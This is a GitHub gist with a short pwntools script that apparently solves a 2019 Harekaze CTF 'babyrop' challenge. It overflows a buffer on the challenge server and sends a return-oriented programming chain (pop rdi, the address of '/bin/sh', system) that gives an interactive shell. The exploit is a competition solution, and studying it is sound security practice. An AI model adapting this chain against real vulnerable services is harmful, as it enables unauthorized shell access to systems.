/babyrop.py
Created May 19, 2019
| #!/usr/bin/env python | |
| from pwn import * | |
| def main(): | |
| # conn = process("./babyrop") | |
| conn = remote("problem.harekaze.com", 20001) | |
| pop_rdi_ret = 0x400683 #: pop rdi ; ret | |
| system = 0x400490 | |
| bin_sh = 0x601048 | |
| payload = "A" * 16 | |
| payload += p64(0xdeadbeef) # rbp | |
| payload += p64(pop_rdi_ret) | |
| payload += p64(bin_sh) | |
| payload += p64(system) | |
| payload += p64(0xdeadbeef) | |
| conn.sendline(payload) | |
| conn.interactive() | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment